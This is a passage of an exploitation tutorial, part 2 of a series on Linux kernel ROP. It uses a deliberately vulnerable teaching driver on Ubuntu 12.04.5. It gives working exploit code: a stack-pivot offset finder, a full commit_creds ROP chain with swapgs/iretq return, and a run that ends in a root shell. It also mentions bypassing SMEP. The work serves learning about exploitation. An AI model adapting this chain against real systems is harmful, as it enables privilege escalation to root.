Linux Kernel ROP - Ropping your way to # (Part 2)

Introduction

In Part 1 of this tutorial, we demonstrated how to find useful ROP gadgets and build a privilege escalation ROP chain for our test system (3.13.0-32 kernel - Ubuntu 12.04.5 LTS). We also developed a vulnerable kernel driver that allowed arbitrary code execution. In this part, we will use this kernel module to demonstrate the ROP chain in practice: escalate privileges, fix up the system state and perform a clean "exit" to user space.

The following is a list of requirements for the ROP chain from Part 1:

Execute a privilege escalation payload

Data residing in user space may be referenced (i.e., "fetching" data from user space is allowed)

Instructions residing in user space may not be executed

The vulnerable kernel module demonstrated in Part 1 allowed setting a function pointer to an arbitrary memory address because it lacked a bounds check on the offset. Our simple trigger code is shown below for reference:

#define DEVICE_PATH "/dev/vulndrv"
...
int main(int argc, char **argv) {
        int fd;
        struct drv_req req;

        req.offset = atoll(argv[1]);

        fd = open(DEVICE_PATH, O_RDONLY);
        if (fd == -1) {
                perror("open");
                return -1;      /* no device, nothing to trigger */
        }

        ioctl(fd, 0, &req);
        return 0;
}

In the code snippet above, we control the request offset value which is declared as unsigned long in our vulnerable kernel module. Using this offset value, we can reference any kernel or user-space memory address.

Stack Pivot

Since we cannot redirect kernel control flow to a user-space address, we need to look for a suitable gadget in kernel space. The idea is to prepare our ROP chain in user space and then set the stack pointer to the beginning of this ROP chain. That way, we are not executing instructions residing in user space directly but rather fetching pointers from user space to instructions in kernel space.

Setting a breakpoint at the entry point of our vulnerable function device_ioctl() , we can examine registers that are either 'static' (have a somewhat fixed value between device_ioctl() invocations) or that we control before the function pointer is dereferenced:

0xffffffffa013d0bd <device_ioctl>       nopl   0x0(%rax,%rax,1)
0xffffffffa013d0c2 <device_ioctl+5>     push   %rbp
0xffffffffa013d0c3 <device_ioctl+6>     mov    %rsp,%rbp
0xffffffffa013d0c6 <device_ioctl+9>     sub    $0x30,%rsp
0xffffffffa013d0ca <device_ioctl+13>    mov    %rdi,-0x18(%rbp)
0xffffffffa013d0ce <device_ioctl+17>    mov    %esi,-0x1c(%rbp)
0xffffffffa013d0d1 <device_ioctl+20>    mov    %rdx,-0x28(%rbp)    [user-space address of passed req struct]
0xffffffffa013d0d5 <device_ioctl+24>    mov    -0x1c(%rbp),%eax
0xffffffffa013d0d8 <device_ioctl+27>    test   %eax,%eax
0xffffffffa013d0da <device_ioctl+29>    jne    0xffffffffa013d145 <device_ioctl+136>
0xffffffffa013d0dc <device_ioctl+31>    mov    -0x28(%rbp),%rax
0xffffffffa013d0e0 <device_ioctl+35>    mov    %rax,-0x10(%rbp)    [save req struct address to -0x10(%rbp)]
0xffffffffa013d0e4 <device_ioctl+39>    mov    -0x10(%rbp),%rax
0xffffffffa013d0e8 <device_ioctl+43>    mov    (%rax),%rax
0xffffffffa013d0eb <device_ioctl+46>    mov    %rax,%rsi
0xffffffffa013d0ee <device_ioctl+49>    mov    $0xffffffffa013e066,%rdi
0xffffffffa013d0f5 <device_ioctl+56>    mov    $0x0,%eax
0xffffffffa013d0fa <device_ioctl+61>    callq  0xffffffff81746ca3
0xffffffffa013d0ff <device_ioctl+66>    mov    -0x10(%rbp),%rax
0xffffffffa013d103 <device_ioctl+70>    mov    (%rax),%rax
0xffffffffa013d106 <device_ioctl+73>    shl    $0x3,%rax
0xffffffffa013d10a <device_ioctl+77>    add    $0xffffffffa013f340,%rax
0xffffffffa013d110 <device_ioctl+83>    mov    %rax,%rsi
0xffffffffa013d113 <device_ioctl+86>    mov    $0xffffffffa013e074,%rdi
0xffffffffa013d11a <device_ioctl+93>    mov    $0x0,%eax
0xffffffffa013d11f <device_ioctl+98>    callq  0xffffffff81746ca3
0xffffffffa013d124 <device_ioctl+103>   mov    $0xffffffffa013f340,%rdx
                                        mov    -0x10(%rbp),%rax
                                        mov    (%rax),%rax
0xffffffffa013d132 <device_ioctl+117>   shl    $0x3,%rax
0xffffffffa013d136 <device_ioctl+121>   add    %rdx,%rax
                                        mov    %rax,-0x8(%rbp)
0xffffffffa013d13d <device_ioctl+128>   mov    -0x8(%rbp),%rax
0xffffffffa013d141 <device_ioctl+132>   callq  *%rax               [1]
                                        jmp    0xffffffffa013d146 <device_ioctl+137>
0xffffffffa013d145 <device_ioctl+136>   nop
0xffffffffa013d146 <device_ioctl+137>   mov    $0x0,%eax
0xffffffffa013d14b <device_ioctl+142>   leaveq
0xffffffffa013d14c <device_ioctl+143>   retq

In [1], i.e., at the callq *%rax instruction (device_ioctl+132), the $rax register contains the address of the instruction to be executed. We can compute this address in advance since we know both the ops array base address and the passed offset value: the address of fn() is the base address plus the offset multiplied by 8 (the shl $0x3 above). For example, given the ops base address 0xffffffffaaaaaaaf and offset = 0x6806288 , the fn address becomes 0xffffffffaaaaaaaf + 0x6806288 * 8 = 0xffffffffdeadbeef .
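The arithmetic can be checked with a few lines of Python. This is only a sketch for illustration and not part of the original exploit: fn_address is a hypothetical helper name, and the 64-bit wrap-around of the kernel's unsigned long arithmetic is modelled with an explicit mask.

```python
MASK64 = (1 << 64) - 1  # emulate 64-bit unsigned wrap-around


def fn_address(ops_base, offset):
    """Address the driver ends up calling: ops_base + offset * 8 (mod 2**64)."""
    return (ops_base + (offset << 3)) & MASK64


# Example values taken from the paragraph above
print(hex(fn_address(0xffffffffaaaaaaaf, 0x6806288)))  # 0xffffffffdeadbeef
```

Because the sum wraps at 64 bits, a very large offset behaves like a negative one, which is how an address below the ops array can be reached.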

We can reverse this logic and try to find the offset value that would give us the desired target address to execute in kernel space. There are many stack pivot gadgets. For example, the following are common stack pivots encountered in user-space ROP chains:

mov %rsp, %rXx ; ret

add %rsp, ...; ret

xchg %rXx, %rsp ; ret

With arbitrary code execution in kernel space, we need to set the stack pointer to a user-space address that we control. Even though our test environment is 64-bit, we're interested in the last stack pivot gadget but with 32-bit registers, i.e., xchg %eXx, %esp ; ret or xchg %esp, %eXx ; ret . In 64-bit mode, writing to a 32-bit register zeroes the upper 32 bits of the corresponding 64-bit register. So if $rXx contains a valid kernel memory address (e.g., 0xffffffffXXXXXXXX), this stack pivot sets the stack pointer to the lower 32 bits of $rXx (0xXXXXXXXX, which is a user-space address). Since the $rax value is known right before executing fn() , we know exactly where the new user-space stack will be and can mmap it accordingly.
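The effect of the 32-bit exchange can be modelled as below. This is a sketch under stated assumptions: pivot_xchg_eax_esp is a made-up name, the $rax value is an example kernel address of an xchg gadget, and the kernel stack pointer value is purely hypothetical.

```python
LOW32 = 0xffffffff


def pivot_xchg_eax_esp(rax, rsp):
    """Model `xchg eax, esp` in 64-bit mode.

    The low 32 bits are swapped and each result is zero-extended to 64 bits.
    """
    new_rax = rsp & LOW32
    new_rsp = rax & LOW32
    return new_rax, new_rsp


rax = 0xffffffff8108e258  # example: kernel address of the gadget being called
rsp = 0xffff88003b4d7e58  # hypothetical kernel stack pointer
new_rax, new_rsp = pivot_xchg_eax_esp(rax, rsp)
print(hex(new_rsp))  # 0x8108e258, a user-space address we can mmap
```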

Using the ROPGadget tool from Part 1, we can see that there are many suitable xchg stack pivots in the kernel image:

0xffffffff81000085 : xchg eax, esp ; ret
0xffffffff81576254 : xchg eax, esp ; ret 0x103d
0xffffffff810242a6 : xchg eax, esp ; ret 0x10a8
0xffffffff8108e258 : xchg eax, esp ; ret 0x11e8
0xffffffff81762182 : xchg eax, esp ; ret 0x12eb
0xffffffff816f4a04 : xchg eax, esp ; ret 0x13e9
0xffffffff81a196fc : xchg eax, esp ; ret 0x1408
0xffffffff814bd0fd : xchg eax, esp ; ret 0x148
0xffffffff8119e39b : xchg eax, esp ; ret 0x148d
0xffffffff813f8ce5 : xchg eax, esp ; ret 0x14c
0xffffffff810db968 : xchg eax, esp ; ret 0x14ff
0xffffffff81d5953e : xchg eax, esp ; ret 0x1589
0xffffffff81951aee : xchg eax, esp ; ret 0x1d07
0xffffffff81703efe : xchg eax, esp ; ret 0x1f3c
...

The only caveat when choosing a stack pivot gadget is that its address needs to be 8-byte aligned: ops is an array of 8-byte pointers with a properly aligned base address, so only addresses of the form base + 8 * offset can be reached. The following simple script can be used to find a suitable gadget:

==================== find_offset.py ====================
#!/usr/bin/env python
# Usage: ./find_offset.py <ops base address (hex)> <gadget list file>
from __future__ import print_function
import sys

base_addr = int(sys.argv[1], 16)

with open(sys.argv[2], 'r') as f:  # gadgets, one "address : instructions" per line
    for line in f:
        target_str, gadget = line.split(':', 1)
        target_addr = int(target_str, 16)

        # check alignment: ops is an array of 8-byte pointers
        if target_addr % 8 != 0:
            continue

        # the driver treats the offset as unsigned long, so wrap to 64 bits
        offset = ((target_addr - base_addr) // 8) % (1 << 64)
        print('offset =', offset)
        print('gadget =', gadget.strip())
        print('stack addr = %x' % (target_addr & 0xffffffff))
        break
========================================================

vnik@ubuntu:~$ cat ropgadget | grep ': xchg eax, esp ; ret' > gadgets
vnik@ubuntu:~$ ./find_offset.py 0xffffffffa0224340 ./gadgets
offset = 18446744073644332003
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

The stack address above is the user-space address where the ROP chain needs to be mmaped ( fake_stack ):

unsigned long *fake_stack;

mmap_addr = stack_addr & 0xfffff000;
/* mmap() requires MAP_PRIVATE or MAP_SHARED; the region is anonymous (no backing file) */
assert((mapped = mmap((void*)mmap_addr, 0x2000, PROT_EXEC|PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, -1, 0)) == (void*)mmap_addr);

fake_stack = (unsigned long *)(stack_addr);
*fake_stack++ = 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

The ret instruction in the chosen stack pivot has a numeric operand. A ret with no operand pops the return address off the stack and jumps to it. However, in some calling conventions (e.g., Microsoft __stdcall), the callee is responsible for cleaning up the stack. In this case, ret takes an operand that gives the number of additional bytes to release from the stack after the return address has been popped. Hence, the first gadget sits at stack_addr and the second ROP gadget is positioned at the offset 0x11e8 + 8 : once the stack pivot is executed, control is transferred to the first gadget and the stack pointer is left at stack_addr + 8 + 0x11e8 .
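A small model of ret with an operand makes the resulting layout easier to see. It is a sketch only: ret_imm16 and the dictionary standing in for the mmaped memory are illustrative names, while the addresses are the ones used in this section.

```python
def ret_imm16(rsp, imm16, memory):
    """Model `ret imm16`: pop an 8-byte return address, then skip imm16 more bytes."""
    rip = memory[rsp]
    new_rsp = rsp + 8 + imm16
    return rip, new_rsp


stack_addr = 0x8108e258
fake_stack = {stack_addr: 0xffffffff810c9ebd}  # first gadget: pop %rdi; ret

# State right after `xchg eax, esp`, when `ret 0x11e8` executes
rip, rsp = ret_imm16(stack_addr, 0x11e8, fake_stack)
print(hex(rip))  # 0xffffffff810c9ebd
print(hex(rsp))  # 0x8108f448 == stack_addr + 0x11e8 + 8
```

The second value is where the rest of the chain has to start, which is why fake_stack is re-pointed at stack_addr + 0x11e8 + 8 after the first gadget is written.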

Payload

Referring to the stack layout from Part 1, we can prepare the ROP chain in user space as follows:

fake_stack = (unsigned long *)(stack_addr);
*fake_stack++ = 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);
*fake_stack++ = 0x0UL;                /* NULL */
*fake_stack++ = 0xffffffff81095430UL; /* prepare_kernel_cred() */
*fake_stack++ = 0xffffffff810dc796UL; /* pop %rdx; ret */
//*fake_stack++ = 0xffffffff81095190UL; /* commit_creds() */
*fake_stack++ = 0xffffffff81095196UL; /* commit_creds() + 2 instructions */
*fake_stack++ = 0xffffffff81036b70UL; /* mov %rax, %rdi; call %rdx */

We've made some modifications to the ROP chain from Part 1. In particular, the commit_creds() address was shifted by 2 instructions. The reason for this is that we're using the call instruction to execute commit_creds() . The call instruction saves the return address on the stack prior to transferring control to the first instruction of commit_creds() . Like any other function, commit_creds() has a prologue and an epilogue that push values on the stack and then pop them off before returning. Hence, once the function has executed, control would be transferred to the saved return address. We, however, want to transfer it to the next gadget in the ROP chain. To use the call instruction as a ROP gadget, we can simply skip one of the push instructions in the prologue:

(gdb) x/10i 0xffffffff81095190
0xffffffff81095190   nopl   0x0(%rax,%rax,1)
0xffffffff81095195   push   %rbp
0xffffffff81095196   mov    %rsp,%rbp
0xffffffff81095199   push   %r13
0xffffffff8109519b   mov    %gs:0xc7c0,%r13
0xffffffff810951a4   push   %r12
0xffffffff810951a6   push   %rbx
0xffffffff810951a7   mov    %rdi,%rbx
0xffffffff810951aa   sub    $0x8,%rsp
0xffffffff810951ae   mov    0x498(%r13),%r12

Skipping push %rbp (and the leading nop) allows us to use the call instruction as a ROP gadget: the return address saved by call takes the stack slot that push %rbp would have filled, so the commit_creds() epilogue pops it off and the final ret transfers control to the next gadget in the chain.
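The stack bookkeeping behind this trick can be simulated with a list. This is a sketch, not kernel code: run_call_gadget is a hypothetical name, and the epilogue is assumed to mirror the prologue shown above (add $0x8,%rsp; pop %rbx; pop %r12; pop %r13; pop %rbp; ret), which is not shown in the gdb output.

```python
def run_call_gadget(rest_of_chain, skip_push_rbp):
    """Simulate the stack across `call %rdx` into commit_creds.

    Index 0 of the list is the top of the stack. Returns the value that the
    final `ret` jumps to.
    """
    stack = list(rest_of_chain)       # ROP chain entries after the call gadget
    stack.insert(0, "saved_ret")      # call pushes its return address
    if not skip_push_rbp:
        stack.insert(0, "rbp")        # push %rbp (skipped when entering at +6)
    for reg in ("r13", "r12", "rbx"):
        stack.insert(0, reg)          # push %r13 / %r12 / %rbx
    stack.insert(0, "pad")            # sub $0x8,%rsp

    # Assumed mirrored epilogue: release pad, pop rbx, r12, r13, rbp
    for _ in range(5):
        stack.pop(0)
    return stack.pop(0)               # ret


print(run_call_gadget(["swapgs_gadget"], skip_push_rbp=True))   # swapgs_gadget
print(run_call_gadget(["swapgs_gadget"], skip_push_rbp=False))  # saved_ret
```

With the push skipped, the epilogue's pop into $rbp consumes the saved return address, so the final ret lands on the next chain entry instead of returning into the call gadget.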

Fixing Up

The ROP chain described above will give our calling process superuser privileges. However, once all ROP gadgets are executed, control will be transferred to whatever value follows the chain on the stack, which is uninitialised memory. We need to somehow restore the stack pointer and transfer control back to our user-space process.

You might be aware that syscalls switch between kernel and user-space context all the time. Once the process executes a syscall, its state needs to be restored so that it can continue executing from the instruction after the syscall. This can be done using the iret (interrupt return) instruction to return from kernel space back to the user-space process. However, iret (or iretq with 64-bit operands in our case) expects a certain stack layout. Starting at the stack pointer and moving towards higher addresses, it pops five values: RIP, CS, EFLAGS, RSP and SS.

We would need to extend our ROP chain to include a new user-space instruction pointer (RIP), mmaped user-space stack pointer (RSP), code and stack segment selectors (CS and SS), and EFLAGS register with various state information. The CS, SS and EFLAGS values can be obtained from the calling user-space process using the following save_state() function:

unsigned long user_cs, user_ss, user_rflags;

static void save_state() {
        asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
}

The address of the iretq instruction in the kernel .text segment can be obtained using objdump :

vnik@ubuntu:~# objdump -j .text -d ~/vmlinux | grep iretq | head -1
ffffffff81053056:       48 cf                   iretq
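The frame that iretq consumes can be sketched as five consecutive 8-byte values. The snippet below is illustrative only: iretq_frame is a made-up helper, and all five example values are hypothetical stand-ins for what save_state() and the exploit would supply at run time.

```python
import struct


def iretq_frame(rip, cs, rflags, rsp, ss):
    """Pack the five quadwords iretq pops, lowest address first."""
    return struct.pack("<5Q", rip, cs, rflags, rsp, ss)


# Hypothetical example values (the real ones are captured at run time)
frame = iretq_frame(rip=0x400b2c, cs=0x33, rflags=0x246, rsp=0x7ffd0000, ss=0x2b)
print(len(frame))                   # 40 bytes: five 8-byte slots
print(struct.unpack("<5Q", frame))  # order: RIP, CS, RFLAGS, RSP, SS
```

The order matters: the chain entries that follow the iretq gadget have to be written in exactly this sequence.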

The last thing to note is that swapgs must be executed before iret on 64-bit systems. This instruction swaps the GS base with a value held in one of the MSRs. At the entry to a kernel-space routine (e.g., a syscall), swapgs is executed to obtain a pointer to kernel data structures; hence, a matching swapgs is required before returning to user space.

We can now put all the pieces of the ROP chain together:

save_state();

fake_stack = (unsigned long *)(stack_addr);
*fake_stack++ = 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);
*fake_stack++ = 0x0UL;                /* NULL */
*fake_stack++ = 0xffffffff81095430UL; /* prepare_kernel_cred() */
*fake_stack++ = 0xffffffff810dc796UL; /* pop %rdx; ret */
*fake_stack++ = 0xffffffff81095196UL; /* commit_creds() + 2 instructions */
*fake_stack++ = 0xffffffff81036b70UL; /* mov %rax, %rdi; call %rdx */
*fake_stack++ = 0xffffffff81052804UL; /* swapgs ; pop rbp ; ret */
*fake_stack++ = 0xdeadbeefUL;         /* dummy placeholder */
*fake_stack++ = 0xffffffff81053056UL; /* iretq */
*fake_stack++ = (unsigned long)shell; /* spawn a shell */
*fake_stack++ = user_cs;              /* saved CS */
*fake_stack++ = user_rflags;          /* saved EFLAGS */
*fake_stack++ = (unsigned long)(temp_stack+0x5000000); /* mmaped stack region in user space */
*fake_stack++ = user_ss;              /* saved SS */

Results

The complete exploit for Ubuntu 12.04.5 (x64) can be found on GitHub. First, we need to obtain the array offset using the base address:

vnik@ubuntu:~$ dmesg | grep addr | grep ops
[ 244.142035] addr(ops) = ffffffffa02e9340
vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets
offset = 18446744073644231139
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

Then, pass the offset and the base address to the ROP exploit:

vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit
vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340
array base address = 0xffffffffa02e9340
stack address = 0x8108e258
# id
uid=0(root) gid=0(root) groups=0(root)
#

And did we mention that this would bypass SMEP? :) There are easier ways to bypass SMEP. For example, clearing the SMEP bit in CR4 with a ROP gadget and then executing the rest of the privilege escalation payload (i.e., commit_creds(prepare_kernel_cred(0)) with iret ) in user space. The goal of this tutorial was not to bypass a certain protection mechanism but to demonstrate that kernel ROP (the entire payload) can be executed in kernel space as easily as ROP in user space. There are obvious downsides to kernel ROP: the main one is that finding gadget addresses requires read access to the kernel boot image (whose permissions default to 0600). This is not an issue for stock kernels but could be problematic for custom kernels if there are no other memory leaks.
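As a footnote to the CR4 remark above: SMEP is controlled by bit 20 of CR4, so the value a ROP chain would write back is the current CR4 with that single bit cleared. The snippet below only illustrates the bit arithmetic; clear_smep is a hypothetical helper and the starting CR4 value is an assumed example, not one read from the test system.

```python
CR4_SMEP = 1 << 20  # SMEP enable flag is bit 20 of CR4


def clear_smep(cr4):
    """Return the CR4 value with the SMEP bit cleared and all other bits kept."""
    return cr4 & ~CR4_SMEP


cr4 = 0x1407f0  # hypothetical CR4 value with SMEP enabled
print(hex(clear_smep(cr4)))  # 0x407f0
```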

If you have any comments, corrections or questions, you can post them below.